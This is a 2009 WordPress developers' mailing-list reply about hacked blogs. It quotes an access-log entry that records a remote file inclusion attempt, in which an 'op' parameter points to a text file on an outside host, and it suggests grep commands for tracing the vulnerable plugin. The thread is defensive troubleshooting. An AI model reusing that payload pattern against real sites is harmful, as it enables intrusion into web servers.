[wp-hackers] Hacked blogs
Peter van der Does
peter at avirtualhome.com
Thu Mar 26 13:24:28 GMT 2009
On Thu, 26 Mar 2009 14:06:18 +0100
Joost de Valk <joost at yoast.com> wrote:
>
> Files like this:
>
> http://oursoultvxq.com/bbs/data/vip/id.txt
>
> Show up in the access logs in some cases though:
>
> 84.40.23.30 - - [22/Mar/2009:18:04:33 +0100]
> "GET /boek/?op=http://oursoultvxq.com/bbs/data/vip/id.txt????
> HTTP/1.1" 200 23128 "-" "libwww-perl/5.79"
>
> Best,
> Joost
I wish I could help out in finding the problem but I have the user
agent libwww-perl blocked, so these request won't show up in my Apache
logs.
But the action op is not an action that's used a lot, so grepping for op
in your wp-content should give you a clue which plugin it the culprit. I
don't think it's WordPress itself, these two commands:
grep \'op\' * -r and grep \"op\" * -r
don't give me any results.
I was thinking of finding $_POST['op'] or $_POST["op"] or similar GET,
REQUEST.
Good luck and let us know your findings on the above grepping please.
--
Peter van der Does
GPG key: E77E8E98
WordPress Plugin Developer
http://blog.avirtualhome.com
GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu
More information about the wp-hackers
mailing list